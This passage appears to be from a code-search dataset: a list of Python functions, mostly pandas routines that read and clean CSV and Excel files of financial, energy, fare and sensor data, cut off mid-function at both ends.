positions_day[columns_to_string].astype(str)\n positions_day = positions_day.replace(\"-\", np.nan)\n\n # ---------------------------------------------------------------------\n # Add valuation date\n date = file.stem.split(\"_\")[-1]\n positions_day[Positions.DATE] = date\n\n # ---------------------------------------------------------------------\n # Append to dataframe\n long = pd.concat([long, positions_day], axis=0)\n\n # -------------------------------------------------------------------------\n # Convert dates to Datetime\n long[Positions.DATE] = pd.to_datetime(long[Positions.DATE])\n\n # -------------------------------------------------------------------------\n # Rename columns to structured names\n map_columnas = {\n PositionsRaw.PRODUCT: Positions.NAME,\n PositionsRaw.ISIN: Positions.ISIN,\n PositionsRaw.QUANTITY: Positions.SHARES,\n PositionsRaw.PRICE: Positions.PRICE,\n PositionsRaw.VALUE_LOCAL: Positions.VALUE_LOCAL,\n PositionsRaw.VALUE_EUR: Positions.VALUE_PORTFOLIO,\n }\n\n long = long.rename(columns=map_columnas)\n\n # -------------------------------------------------------------------------\n # Add position type\n mask_has_isin = long[Positions.ISIN].notna()\n\n long.loc[mask_has_isin, Positions.TYPE] = AssetType.ASSET\n long.loc[~mask_has_isin, Positions.TYPE] = AssetType.CASH\n\n # -------------------------------------------------------------------------\n # Sort by date\n long = long.sort_values(by=Positions.DATE)\n long = long.reset_index(drop=True)\n\n return long", "def whole_data(arg_file_names_list):\r\n\r\n whole_data_list = []\r\n # loop which iterates through the directory and executes function vat_return_reader for each file\r\n for file_name in arg_file_names_list:\r\n whole_data_list.append(vat_return_reader(file_name))\r\n # creates data frame from list\r\n df = pd.DataFrame(whole_data_list)\r\n # adds total row \r\n df = pd.concat([df,pd.DataFrame(df.sum(axis=0),columns=['Total']).T])\r\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_data(filepath):\n df = pd.read_csv(filepath)\n return df", "def read_elia_imbalanceprices(filename,status):\r\n \r\n df = pd.read_excel(filename,skiprows=1,parse_dates=False)\r\n df[\"Timestamp\"] = df[\"Date\"]+\" \"+df['Quarter'].map(lambda x: str(x)[:-9])\r\n pd.to_datetime(df[\"Timestamp\"])\r\n df.set_index(\"Timestamp\",inplace=True)\r\n if ((status == \"validated\") | (status == \"valid\")):\r\n df = df.drop(df[df.Status != \"Validated\"].index)\r\n df = df.drop([\"Date\",\"Quarter\",\"Status\"], axis=1)\r\n \r\n if len(df.columns) == 3:\r\n df.columns.values[0:3] = [\"NRV in MW\",\"POS in euro/MWh\", \"NEG in euro/MWh\"]\r\n \r\n if len(df.columns) == 7:\r\n df.columns.values[0:7] = [\"NRV in MW\",\"SI in MW\",\"alpha in euro/MWh\",\"MIP in euro/MWh\", \"MDP in euro/MWh\",\"POS in euro/MWh\", \"NEG in euro/MWh\"]\r\n \r\n if len(df.columns) == 8:\r\n df.columns.values[0:8] = [\"NRV in MW\",\"SI in MW\",\"alpha in euro/MWh\",\"MIP in euro/MWh\", \"MDP in euro/MWh\",\"SR in euro/MWh\",\"POS in euro/MWh\", \"NEG in euro/MWh\"]\r\n\r\n return df", "def ticketing_data_import(file_name, path=path):\n \n accepted_file_names = [\"Clx\", \"Pops\", \"Summer\", \"Chamber\", \"Connections\",\n \"Family\", \"Organ\", \"Specials\"]\n \n if file_name not in accepted_file_names:\n raise ValueError('file_name must be of accepted file types: ', \n accepted_file_names)\n \n files = [pd.read_csv(path + file_name + fy + 
\".csv\", skiprows=3) for fy in fiscal_years]\n tix_raw = pd.concat(files, ignore_index=True)\n \n return tix_raw", "def data_from_csv(self, filepath):\n self.dataframe = pd.load_csv(filepath, separator='')", "def parse_csv_files(csv_files, **kwargs):\n\n per_token_savings = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))\n slip_price_diff_splits = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))\n\n for file in csv_files:\n per_file_base_prices = {}\n for _, _, trade_size, token, exchange, exchange_price, _, totle_price, pct_savings, splits, _ in csv_row_gen(file, **kwargs):\n if not per_file_base_prices.get(token): # this assumes prices recorded from lowest to highest for a token\n per_file_base_prices[token] = totle_price # should be same for all aggs, but is slightly different sometimes\n\n slip = (totle_price / per_file_base_prices[token]) - 1.0 # should be 0 for the lowest trade_size\n # i.e. slip = (totle_price - per_file_base_prices[token]) / per_file_base_prices[token]\n\n slip = 0.0 if slip < 0.0 and slip > -0.00001 else slip # get rid of -0.0000\n price_diff = (totle_price - exchange_price) / exchange_price\n\n slip_price_diff_splits[token][trade_size][exchange].append((slip, price_diff, splits))\n per_token_savings[token][trade_size][exchange].append(pct_savings)\n\n\n return per_token_savings, slip_price_diff_splits", "def filter_data_on_complaince(folder_Path,complaince_rate):\n complaince_df=pd.read_csv(folder_Path+\"complaince.csv\")\n complaince_df['Percent'] = complaince_df['Percent'].apply(converters.ConvertPercent)\n complaince_df = complaince_df.loc[complaince_df.Percent >= complaince_rate]\n IDs= complaince_df.ID.unique()\n # print(IDs)\n df_apps=pd.read_csv(folder_Path+\"app_usage.csv\")\n df_apps = df_apps.loc[df_apps.user_id.isin(IDs)]\n df_apps = df_apps.reset_index(drop=True)\n df_apps.to_csv(folder_Path+\"Filtered/app_usage.csv\")\n\n\n df_battery= pd.read_csv(folder_Path+\"battery_events.csv\")\n df_battery= df_battery.loc[df_battery.user_id.isin(IDs)]\n df_battery = df_battery.reset_index(drop=True)\n df_battery.to_csv(folder_Path+\"Filtered/battery_events.csv\")\n\n\n df_bluetooth = pd.read_csv(folder_Path+\"bluetooth.csv\")\n df_bluetooth = df_bluetooth.loc[df_bluetooth.user_id.isin(IDs)]\n df_bluetooth = df_bluetooth.reset_index(drop=True)\n df_bluetooth.to_csv(folder_Path+\"Filtered/bluetooth.csv\")\n\n df_screen = pd.read_csv(folder_Path+\"screenstate.csv\")\n df_screen = df_screen.loc[df_screen.user_id.isin(IDs)]\n df_screen = df_screen.reset_index(drop=True)\n df_screen.to_csv(folder_Path+\"Filtered/screenstate.csv\")\n\n\n df_wifi = pd.read_csv(folder_Path+\"wifi.csv\")\n df_wifi = df_wifi.loc[df_wifi.user_id.isin(IDs)]\n df_wifi = df_wifi.reset_index(drop=True)\n df_wifi.to_csv(folder_Path+\"Filtered/wifi.csv\")", "def load_vix_futures_prices(source_dir, price='Close',\n start_year=2005, end_year=2099):\n\n data = {}\n\n files = glob.glob(os.path.join(source_dir, 'CFE_*'))\n for f in files:\n filename = os.path.basename(f)\n month = FUTURES_MONTHS.index(filename[4])\n year = int('20' + filename[5] + filename[6])\n\n if year < start_year or year > end_year:\n continue\n\n try:\n df = load_symbol_data(f, index=0, header_row=0)\n except IndexError:\n df = load_symbol_data(f, index=0, header_row=1)\n\n if year not in data:\n data[year] = 12 * [None]\n data[year][month] = df[price]\n\n return data", "def get_data(symbols, dates):\n df = pd.DataFrame(index=dates)\n if \"SPY\" not in symbols:\n symbols.insert(0, \"SPY\")\n for symbol 
in symbols:\n temp = pd.read_csv(symbol_to_path(symbol, base_dir=\"data\"), \n index_col=\"Date\", \n parse_dates=True, \n usecols=[\"Date\", \"Adj Close\"])\n \n temp = temp.rename(columns={\"Adj Close\": symbol})\n \n df = df.join(temp, how=\"inner\")\n df = df.sort_index(axis=0, ascending=[1])\n \n return df", "def get_data(symbols, dates):\n df = pd.DataFrame(index=dates)\n \n if 'SPY' not in symbols: #add SPY for reference\n symbols.insert(0,'SPY')\n \n # This for loop will loop through all the desired\n # symbols in the symbol list and create a dataframe\n # containing all the required data\n for symbol in symbols:\n # Get path for .csv file for symbol\n sym_path = symbol_to_path(symbol)\n # Load data from csv and create dataframe\n if symbol == 'SPY':\n dfSPY = pd.read_csv(sym_path,\n index_col=\"Date\",\n parse_dates=True,\n usecols=[\"Date\",\"Adj Close\"],\n na_values=['nan'])\n \n dfSPY = dfSPY.rename(columns={\"Adj Close\": str(symbol)})\n df = df.join(dfSPY,how='inner') # inner joins and drops NaN\n else:\n df_temp = pd.read_csv(sym_path,\n index_col=\"Date\",\n parse_dates=True,\n usecols=[\"Date\",\"Adj Close\"],\n na_values=['nan'])\n df_temp = df_temp.rename(columns={\"Adj Close\": str(symbol)})\n df = df.join(df_temp,how='inner')\n df = df.sort_index(ascending=True)\n return df", "def import_data():\n import pandas as pd\n \n df = pd.read_csv('Company_Bankruptcy_Prediction.csv')\n return df", "def open_file(path):\r\n f = open(path, encoding='utf-8', errors='ignore')\r\n data = f.readlines()\r\n lst_with_data = []\r\n for i in data:\r\n i = i.replace('\"', ' ').replace(\"\\t\", ' ').replace(\"\\n\", \" \").replace(\"'\", ' ').split(' ')\r\n lst_with_data.append(i)\r\n res_lst = [] \r\n for i in lst_with_data:\r\n append_lst = []\r\n for j in i:\r\n if j.isdigit() or j == \"-\":\r\n append_lst.append(j) \r\n if len(append_lst) != 0: \r\n res_lst.append(append_lst) \r\n res_lst = res_lst[1:]\r\n res = [] \r\n for i in res_lst:\r\n if len(i) != len(res_lst[0]):\r\n i = i[1:]\r\n res.append(i) \r\n else:\r\n res.append(i) \r\n ln = len(res[0])\r\n data_by_years = []\r\n for i in range(ln):\r\n data_y = []\r\n for j in res:\r\n data_y.append(j[i])\r\n data_by_years.append(data_y) \r\n dict_by_years = {}\r\n dict_with_total = file_with_total_inform(\"Total_Lviv.csv\")\r\n for i in data_by_years:\r\n dict_by_years[int(i[0])] = causes(i)\r\n dict_by_years[int(i[0])].update({\"Total\": dict_with_total[i[0]]})\r\n res_dict = {}\r\n res_dict[\"Lviv\"] = dict_by_years \r\n return res_dict", "def clean_stockdata(filename):\n pct_cols = ['Change',\n 'Dividend Yield',\n 'EPS growth next 5 years',\n 'EPS growth past 5 years',\n 'Float Short',\n 'Performance (Half Year)',\n 'Performance (Month)',\n 'Performance (Quarter)',\n 'Performance (Week)',\n 'Performance (YTD)',\n 'Performance (Year)',\n 'Sales growth past 5 years',\n 'Payout Ratio',\n 'EPS (ttm)',\n 'EPS growth this year',\n 'EPS growth next year',\n 'EPS growth past 5 years',\n 'EPS growth next 5 years',\n 'Sales growth past 5 years',\n 'EPS growth quarter over quarter',\n 'Sales growth quarter over quarter',\n 'Insider Ownership',\n 'Insider Transactions',\n 'Institutional Ownership',\n 'Institutional Transactions',\n 'Float Short',\n 'Return on Assets',\n 'Return on Equity',\n 'Return on Investment',\n 'Gross Margin',\n 'Operating Margin',\n 'Profit Margin',\n 'Volatility (Week)',\n 'Volatility (Month)',\n '20-Day Simple Moving Average',\n '50-Day Simple Moving Average',\n '200-Day Simple Moving Average',\n '50-Day High',\n 
'50-Day Low',\n '52-Week High',\n '52-Week Low',\n 'Change from Open',\n 'Gap',\n 'Change']\n df = pd.read_csv(filename)\n df[pct_cols] = df[pct_cols].applymap(clean_pcts)\n df.drop('No.', axis=1, inplace=True)\n df.to_csv(filename, index=False)", "def get_data(symbols, dates):\n df = pd.DataFrame(index=dates)\n if 'SPY' not in symbols: # add SPY for reference, if absent\n symbols.insert(0, 'SPY')\n\n for symbol in symbols:\n # TODO: Read and join data for each symbol\n if os.path.isfile(symbol_to_path(symbol)): \n df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date', \n parse_dates = True, usecols=['Date', 'Adj Close'], na_values=['nan'])\n df_temp = df_temp.rename(columns = {'Adj Close': symbol})\n df = df.join(df_temp)\n if symbol == 'SPY': #drop dates SPY did not trade\n df = df.dropna(subset=[\"SPY\"])\n# else:\n# download_symbol(symbol) \n return df", "def open_file(stock, name, setup=False):\n if not isinstance(stock, str):\n raise TypeError(\"Parameter 'stock' should be a string, not a \"\n + type(stock).__name__)\n if setup is True: # when setup, name is \"AAPL_income.csv\", not \"income\"\n # path = _os.path.join(datapath(setup=False), stock, name)\n path = datapath(True, stock, name)\n df = _pd.read_csv(path)\n _gc.collect()\n return df\n # not setup, normal open_file\n names = ['major_holders', 'top_institutional_holders', 'top_mutual_fund_holders',\n 'Trading_Information', 'Financial_Highlights', 'Valuation_Measures',\n 'Executives', 'Description',\n 'Earnings_Estimate', 'Revenue_Estimate', 'Earnings_History',\n 'EPS_Trend', 'EPS_Revisions', 'Growth_Estimates',\n 'stats', 'statements', 'reports',\n 'Executives', 'Description', 'analysis', 'Summary',\n 'balance', 'cash_flow', 'income']\n if name not in names:\n try:\n name = _path(name) # when client mistakenly input factor instead of sheet name\n except ValueError:\n raise ValueError(\n 'Parameter \"name\" should be the name of the financial sheets, not a factor name...Use path method to '\n 'find the location of a factor')\n path = datapath(True, stock, stock)\n try:\n df = _pd.read_csv(path + '_' + name + '.csv')\n _gc.collect()\n except FileNotFoundError:\n _gc.collect()\n if _os.path.exists(datapath(True, stock)):\n raise ValueError(\"There is no sheet - {} - for company {}. 
Use main_get to retrieve the sheet\".format\n (name, stock))\n else:\n raise ValueError(\"There is no record of '\" + stock + \"' in database\")\n return df", "def read_csv_ur10(self, csv_file):\r\n df = pd.read_csv(csv_file, sep=';', decimal=',', header=0)\r\n return df", "def process_input_df(df_raw, market, price_col_id):\n # drop all non required columns from data frame\n df = drop_columns(df_raw, [price_col_id])\n\n # rename last price column to uniform convention\n df = df.rename(columns={price_col_id: 'close'})\n\n # calculate required indicators\n df[market + '_rt1'] = np.log(df['close']).diff().shift(1) * 100\n df[market + '_asy5_r'] = df[market + '_rt1'].rolling(window=5).sum() / 5\n df[market + '_asy4_r'] = df[market + '_rt1'].rolling(window=4).sum() / 4\n df[market + '_asy3_r'] = df[market + '_rt1'].rolling(window=3).sum() / 3\n df[market + '_asy2_r'] = df[market + '_rt1'].rolling(window=2).sum() / 2\n\n return df", "def csv_to_close(csv_filepath, field_names):\n\n # TODO: Implement Function\n prices_df = pd.read_csv(csv_filepath, names=field_names)\n\n close_prices = prices_df.pivot(index=\"date\", columns=\"ticker\", values='close')\n\n return close_prices", "def _data_reader(file):\n # Create a dictionary so that filename matches a site name.\n site_dict = {'D05536000': 'NB Niles', 'D05536101': 'NS Channel-Wilmette',\n 'D05536105': 'NB Albany', 'D05536118': 'NB Grand Avenue',\n 'D05536121': 'CH River-Lock', 'D05536123': 'CH River-Columbus',\n 'D05536137': 'CSSC-Western Avenue', 'D05536140': 'CSSC-Stickney',\n 'D05536275': 'Thorn Creek', 'D05536290': 'Little Calument',\n 'D05536340': 'Midlothian Creek', 'D05536343': 'Natalie Creek',\n 'D05536357': 'Grand Calumet', 'D05536500': 'Tinley Creek',\n 'D05536700': 'Calumet-Sag Channel', 'D05536890': 'CSSC-Lemont',\n 'D05536995': 'CSSC-Romeoville'}\n df_raw = pd.read_csv(file)\n df_raw['dateTime'] = pd.to_datetime(df_raw['dateTime'])\n # Creating a dataframe with the data we only need.\n df = df_raw[['dateTime', 'X_00065_00000']]\n df = df.set_index(df_raw['dateTime'])\n\n # Retrieve site information to be used in saved excel filenames.\n site_code = file[-9:]\n site_name = [v for v in site_dict.items() if site_code in v][0]\n site = site_code + '_' + site_name[1].replace(' ', '-')\n\n # Convert index into a datetime index for easier indexing.\n df.index = pd.to_datetime(df.index)\n return df_raw, df, site, site_code", "def get_crypto_daily_price(cryptotickers = [], allData=False,limit = 90):\n api_key = os.getenv(\"CC_API\")\n ticker_list = cryptotickers\n crypto_df = pd.DataFrame()\n\n for ticker in ticker_list:\n #if allData is true, then it gets all the data available. 
If not, select data according to limit.\n if allData:\n url = f\"https://min-api.cryptocompare.com/data/v2/histoday?fsym={ticker}&tsym=USD&allData=true&api_key={api_key}\"\n else:\n url = f\"https://min-api.cryptocompare.com/data/v2/histoday?fsym={ticker}&tsym=USD&limit={limit}&api_key={api_key}\"\n \n raw_data = read_json(url)\n #print(json.dumps(raw_data, indent=5))\n df = pd.DataFrame(raw_data['Data']['Data'])\n df['time'] = pd.to_datetime(df['time'],unit='s')\n df.set_index(df['time'], inplace=True)\n df['close'] = df['close'].astype(float)\n crypto_df[ticker] = df['close']\n \n #\n new_columns = pd.MultiIndex.from_product([ crypto_df.columns, [\"close\"] ])\n crypto_df.columns = new_columns\n\n return crypto_df", "def create_from_csv(self, file_path):\n securities = []\n\n with open(file_path, \"r\") as f:\n # skip the first line (=column names)\n next(f)\n\n for line in f:\n security_code, num_shares = line.strip(\"\\n\").split(\",\")\n # omit the trailing 0\n symbol = security_code[:-1]\n num_shares = int(num_shares)\n\n if symbol in self.securities.keys():\n self.securities[symbol].shares = num_shares\n\n return securities", "def load(cls, path, start_date=None):\n results = []\n skipped = []\n closes = cls.load_daily()\n configs = SymbolConfigurations.load()\n pnls = pd.read_csv(path, parse_dates=True, index_col=0)\n for key in pnls:\n try:\n print(\"Processing strategy: {}\".format(key))\n id, symbol, period, name = key.split(\"_\")[:4]\n multipoint = configs.basic[\"MultiPioint\"].loc[symbol]\n close = closes[symbol.lower()]\n new_dataframe = pd.concat([pnls[key], close * multipoint * 1.0 / LEVERAGE], join=\"inner\", axis=1)\n new_dataframe.columns = [\"pnl\", \"base\"]\n new_dataframe[\"return\"] = new_dataframe[\"pnl\"] / new_dataframe[\"base\"]\n if start_date:\n new_dataframe = new_dataframe[start_date:]\n results.append(cls(id, name, symbol, period, new_dataframe))\n except Exception as e:\n print(e)\n skipped.append(key)\n\n print(\"The following strategies are skipped due to exception in processing: \")\n print(\"\\t{}\".format(skipped))\n return results", "def import_service_learning(filenames):\n\tl = []\n\tfor file in filenames:\n\t\tdf = pd.read_csv(file, header=None, usecols=[10, 12])\n\t\tdf.rename(columns={10: 'ID', 12: 'service_hours'}, inplace=True)\n\t\tdf.dropna(subset=['ID'], inplace=True)\n\t\tdf['ID'] = df['ID'].astype(int) \n\t\tdf.set_index('ID', inplace=True)\n\t\tl.append(df)\n\n\televen, twelve = l\n\tsl_df = eleven.append(twelve)\n\n\treturn sl_df", "def calc_price(filename, opens=open):\n cost_all_item = 0\n with opens(filename, 'rt') as csv_file:\n for row in csv_file.readlines():\n item = row.split(\",\")\n cost_all_item = (float(item[1]) * float(item[2])) + cost_all_item\n csv_file.close()\n return cost_all_item", "def from_csv_to_database():\r\n for year, path in FileNamePath.items():\r\n # load csv files\r\n with open(path, encoding='cp1251') as dataset:\r\n print(f\"Download {year} data\")\r\n get_curr_data(dataset, year)", "def create_raw_data():\r\n for csv_file in glob.glob(raw_loc + 'ticket_data/PRR_*'):\r\n filestring =os.path.basename(csv_file)\r\n index_start = 1\r\n j = 0\r\n start = dt.datetime.now()\r\n print('{} file started at {}'.format(filestring, start.strftime(\"%H:%M\")))\r\n df = pd.read_csv(csv_file, encoding = 'utf-8', parse_dates = ['Tick Issue Date'])\r\n df = df.rename(columns = {c: c.replace(' ', '') for c in df.columns})\r\n try:\r\n df.to_sql('raw_ticket_data', con = conn, if_exists='append')\r\n except:\r\n print('File 
read error')\r\n\r\n\r\n print ('{} file finished in {:03.2f} minutes '.format(filestring, (dt.datetime.now()-start).seconds / 60))", "def get_rdg_prices_info(infilepath,infilename,outfilepath,outfilename,year,excludeflowid = False):\n \n print(f\"getting RDG prices data for {year} \\n \")\n flow_list, fare_list = getdata(infilepath,infilename)\n \n print(\"splitting the data into flow and fares\\n\")\n flow_df, fares_df = splitter(flow_list, fare_list)\n\n print(\"replacing the outofbounds date values \\n \")\n #replacing the outofbounds date value 31122999 with 31122100\n flow_df['VALID_UNTIL'].replace(['31122999'],['31122100'],inplace=True)\n \n print(\"converting the valid_until into date format \\n\")\n #formatting the date valid until\n flow_df['DATE_VALID_UNTIL'] = flow_df['VALID_UNTIL'].apply(lambda x: pd.to_datetime(str(x),format='%d%m%Y'))\n\n #remove rows where the Valid_Until date != the max value of Valid_Until\n idx = flow_df.groupby(['ORIGIN_CODE','DESTINATION_CODE','ROUTE_CODE'])['DATE_VALID_UNTIL'].transform(max) == flow_df['DATE_VALID_UNTIL']\n flow_df = flow_df[idx]\n\n print(\"exporting the flow and fares with separate info\\n\")\n exportfile(flow_df,outfilepath,'flow_info_'+ year)\n exportfile(fares_df,outfilepath,'fares_info'+ year)\n\n #joining the flow and fares information\n print(\"joining flow and fares information\\n\")\n combined_data = pd.merge(flow_df,fares_df, on='FLOW_ID')\n combined_data.reset_index(drop=True, inplace=True)\n combined_data.index.name=\"FLOW_AND_FARES_INDEX\"\n\n #add the filter for given year for flow_id to remove duplicate flow id information\n #combined_data_no_duplicates = removeRDGduplicates(combined_data, year,excludeflowid)\n\n #reading in the lookup value for the LENNON codes lookup\n lookupinfo = pd.read_excel(infilepath +'Lennon_product_codes_and_Fares_ticket_types_2017.xlsx','Fares to Lennon coding')\n\n ##join lookupinfo with Lennon keys\n combined_data_with_lennon = pd.merge(combined_data,lookupinfo,'left',left_on=['TICKET_CODE'],right_on=['Fares ticket type code'])\n\n # remove duplicates where fares are the same\n combined_data_with_lennon.drop_duplicates(subset=['ORIGIN_CODE','DESTINATION_CODE','ROUTE_CODE','TICKET_CODE','FARE'],keep='first',inplace=True)\n \n #flag up duplicates where fares are different\n flowandfaresduplicateflag = combined_data_with_lennon.duplicated(subset=['ORIGIN_CODE','DESTINATION_CODE','ROUTE_CODE','TICKET_CODE'],keep=False)\n duplicateswithdifferentfares = combined_data_with_lennon[flowandfaresduplicateflag]\n exportfile(duplicateswithdifferentfares,outfilepath,\"Duplicates with different fares in flow and fares file for_\" + year)\n\n ##return the completed file\n return combined_data_with_lennon", "def generate_DataFrame(file_path):\n # print (\"Generating DataFrame\")\n __log(1, 'Generating DataFrame....')\n\n df = pd.read_csv(file_path)\n df = df.rename(columns=lambda x: x.strip())\n df = df.dropna()\n\n for i in list(df.keys()):\n df[i] = df[i].apply(cleaning)\n\n # print (\"DataFrame Generated Successfully\")\n __log(1, 'DataFrame Generated Sucessfully.')\n return df", "def read_csv(self, path):\n for file in os.listdir(path):\n if file[-4:] == \".csv\":\n name = file[:-4]\n table_index_header = cfg.get_list(\"table_index_header\", name)\n filename = os.path.join(path, file)\n self.input_data[name] = pd.read_csv(\n filename,\n index_col=list(range(int(table_index_header[0]))),\n header=list(range(int(table_index_header[1]))),\n squeeze=(\"series\" not in name),\n )\n 
self.check_input_data(warning=False)\n self.add_meta_data()\n return self", "def GetCurrencies():\n return GetDataFromCsvFile('currencies.csv')", "def get_data(filename):\r\n return pd.read_csv(filename)", "def read_data(name: str) -> pd.DataFrame:\n import_dir = Path.cwd().joinpath('eikon_data_files')\n\n path = Path.joinpath(import_dir, Path(name))\n if path.exists():\n return pd.read_csv(path, sep=',')\n else:\n print('File type \"' + name + '.csv' + ' does not exist. Aborted.')\n quit()", "def payment_engine(transaction_filename: str):\n try:\n transaction_list = TransactionList(pd.read_csv(transaction_filename))\n account_manager = AccountManager()\n transaction_list.process(account_manager)\n accounts = account_manager.accounts_data()\n print(accounts.to_csv(index=False))\n except FileNotFoundError:\n pass", "def readData(filename):\n #defining gobal variable (dataframe) to access it outside this function\n global dataframe\n #storing full CSV file into a dataframe(data structure)\n dataframe = pd.read_csv(filename)\n #type casting temperature column of dataframe to numeric data and ignoring '***' values\n dataframe['Temperature'] = pd.to_numeric(dataframe['Temperature'], errors='coerce')\n return dataframe", "def run(self) -> pd.DataFrame:\n with open(self.file_path, 'r') as in_file:\n headers = in_file.readline()\n headers = headers.replace(\"\\n\", \"\")\n\n if ',' in headers:\n headers = headers.split(',')\n else:\n headers = headers.split()\n\n if headers == self.NORMAL_HEADERS:\n return self.normal_csv()\n else:\n return self.read_data_columns_to_rows()", "def separate_file(self):\n df = pd.read_csv(\"nfl_drafts.csv\", names = ['Pick', 'Team', 'Player_name', 'POS', \n 'Age', 'Last_played', 'AP1', 'PB', 'ST', 'CarAV', 'DrAV', 'G_perS', 'PaCmp', 'PaAtt', \n 'PaYds', 'PaTD', 'Int', 'Att', 'Yds', 'RuTD', 'Rec', 'ReYds', 'ReTD', 'Solo', 'DeInt', \n 'Sk', 'Coll/Univ', 'Stat'], error_bad_lines = False)\n return df", "def getrailfinancial(df,outputlocation):\n #create filename with date_and_timestamp\n formatted_date = datetime.datetime.now().strftime('%Y%m%d_%H-%M')\n destinationfilename = f'rail_financial_data_{formatted_date}.xlsx'\n\n # group and sum the superfile by two cuts\n revsplitbytocticketreg = df.groupby(['Carrier TOC / Third Party Code','Product Code','Regulated_Status'],as_index=False).agg({'Adjusted Earnings Amount':['sum']})\n revsplitbytocsectorclasscatreg = df.groupby(['Carrier TOC / Third Party Code','sector','class','Category','Regulated_Status'], as_index=False).agg({'Adjusted Earnings Amount':['sum']})\n\n # rename columns of the group and summed data\n revsplitbytocticketreg.rename(columns = {'Carrier TOC / Third Party Code':'TOC','Product Code':'Ticket','Regulated_Status':'Reg/Unreg','Adjusted Earnings Amount':'Earnings'},inplace=True)\n revsplitbytocsectorclasscatreg.rename(columns = {'Carrier TOC / Third Party Code':'TOC','sector':'Sector','class':'Class','Category':'Category','Regulated_Status':'Reg/Unreg','Adjusted Earnings Amount':'Earnings'},inplace=True) \n\n #prepare excel writer object, export dataframes to two different ranges and save excel file\n writer = pd.ExcelWriter(outputlocation + destinationfilename, engine='xlsxwriter')\n revsplitbytocticketreg.to_excel(writer,sheet_name='rail_financial_data')\n revsplitbytocsectorclasscatreg.to_excel(writer,sheet_name='rail_financial_data',startcol=10 )\n writer.save()", "def fillHistoricalPricesAndRating(self):\r\n time_start = time.time()\r\n self.buildPriceHistory()\r\n savepath = TEMPPATH + 
'bondhistoryrating.csv'\r\n #If bondhistoryratingUAT.csv doesn't exist, download data and write file.\r\n cols = ['SNP', 'MDY', 'FTC', 'P1D', 'P1W', 'P1M', 'Y1D', 'Y1W', 'Y1M', 'ACCRUED', 'D2CPN', 'SAVG', 'ISP1D', 'ISP1W', 'ISP1M', 'RISK_MID', 'PRINCIPAL_FACTOR', 'SIZE']\r\n if not (os.path.exists(savepath)) or datetime.datetime.fromtimestamp(\r\n os.path.getmtime(savepath)).date() < datetime.datetime.today().date():\r\n isins = self.df['ISIN'] + BBGHand + ' Corp'\r\n isins = list(isins.astype(str))\r\n\r\n ##\r\n flds = ['RTG_SP', 'RTG_MOODY', 'RTG_FITCH', 'INT_ACC', 'DAYS_TO_NEXT_COUPON', 'YRS_TO_SHORTEST_AVG_LIFE', 'RISK_MID', 'PRINCIPAL_FACTOR', 'AMT_OUTSTANDING']\r\n out = blpapiwrapper.simpleReferenceDataRequest(pandas.Series((self.df['ISIN'] + ' Corp').values, index=self.df.index).to_dict(),flds)[flds]\r\n #loop\r\n for f in flds:\r\n self.df[bbgToBdmDic[f]] = out[f]\r\n self.df['RISK_MID'].fillna(0, inplace=True)\r\n ##\r\n self.df.drop(['P1D', 'P1W', 'P1M', 'Y1D', 'Y1W', 'Y1M', 'ISP1D', 'ISP1W', 'ISP1M'], axis=1, inplace=True)\r\n dbPriceHistory = pandas.read_csv(PHPATH + 'dbPriceHistory.csv', index_col=0)\r\n dbYieldHistory = pandas.read_csv(PHPATH + 'dbYieldHistory.csv', index_col=0)\r\n dbSpreadHistory = pandas.read_csv(PHPATH + 'dbSpreadHistory.csv', index_col=0)\r\n hdt = []\r\n if self.dtYesterday.strftime('%Y%m%d') in dbPriceHistory.columns:\r\n hdt.append(self.dtYesterday.strftime('%Y%m%d'))\r\n else:\r\n self.df['P1D'] = pandas.np.nan\r\n self.df['Y1D'] = pandas.np.nan\r\n self.df['ISP1D'] = pandas.np.nan\r\n if self.dtLastWeek.strftime('%Y%m%d') in dbPriceHistory.columns:\r\n hdt.append(self.dtLastWeek.strftime('%Y%m%d'))\r\n else:\r\n self.df['P1W'] = pandas.np.nan\r\n self.df['Y1W'] = pandas.np.nan\r\n self.df['ISP1W'] = pandas.np.nan\r\n if self.dtLastMonth.strftime('%Y%m%d') in dbPriceHistory.columns:\r\n hdt.append(self.dtLastMonth.strftime('%Y%m%d'))\r\n else:\r\n self.df['P1M'] = pandas.np.nan\r\n self.df['Y1M'] = pandas.np.nan\r\n self.df['ISP1M'] = pandas.np.nan\r\n ohdt = [self.dtYesterday.strftime('%Y%m%d'), self.dtLastWeek.strftime('%Y%m%d'), self.dtLastMonth.strftime('%Y%m%d')]\r\n self.df = self.df.join(dbPriceHistory[hdt], on='ISIN')\r\n self.df.rename(columns={ohdt[0]:'P1D', ohdt[1]:'P1W', ohdt[2]:'P1M'}, inplace=True)\r\n self.df = self.df.join(dbYieldHistory[hdt], on='ISIN')\r\n self.df.rename(columns={ohdt[0]:'Y1D', ohdt[1]:'Y1W', ohdt[2]:'Y1M'}, inplace=True)\r\n self.df = self.df.join(dbSpreadHistory[hdt], on='ISIN')\r\n self.df.rename(columns={ohdt[0]:'ISP1D', ohdt[1]:'ISP1W', ohdt[2]:'ISP1M'}, inplace=True)\r\n\r\n self.df[cols].to_csv(savepath)\r\n self.df['ACCRUED'] = self.df['ACCRUED'].apply(lambda x: '{:,.2f}'.format(float(x)))\r\n self.df['D2CPN'].fillna(-1, inplace=True)\r\n self.df['D2CPN'] = self.df['D2CPN'].astype(int)\r\n self.df[['RISK_MID','PRINCIPAL_FACTOR','SIZE']] = self.df[['RISK_MID','PRINCIPAL_FACTOR','SIZE']].astype(float)\r\n self.df[['SNP', 'MDY', 'FTC']] = self.df[['SNP', 'MDY', 'FTC']].fillna('NA') # ,'ACCRUED','D2CPN'\r\n self.df[['SNP', 'MDY', 'FTC', 'ACCRUED']] = self.df[['SNP', 'MDY', 'FTC', 'ACCRUED']].astype(str)\r\n\r\n #Otherwise, load and read from file.\r\n else:\r\n print 'Found existing file from today'\r\n df = pandas.read_csv(savepath, index_col=0)\r\n self.df[cols] = df[cols]\r\n self.df[['RISK_MID','PRINCIPAL_FACTOR','SIZE','SAVG', 'ISP1D','ISP1W','ISP1M']] = self.df[['RISK_MID','PRINCIPAL_FACTOR','SIZE','SAVG', 'ISP1D','ISP1W','ISP1M']].astype(float)\r\n self.df[['SNP', 'MDY', 'FTC']] = self.df[['SNP', 'MDY', 
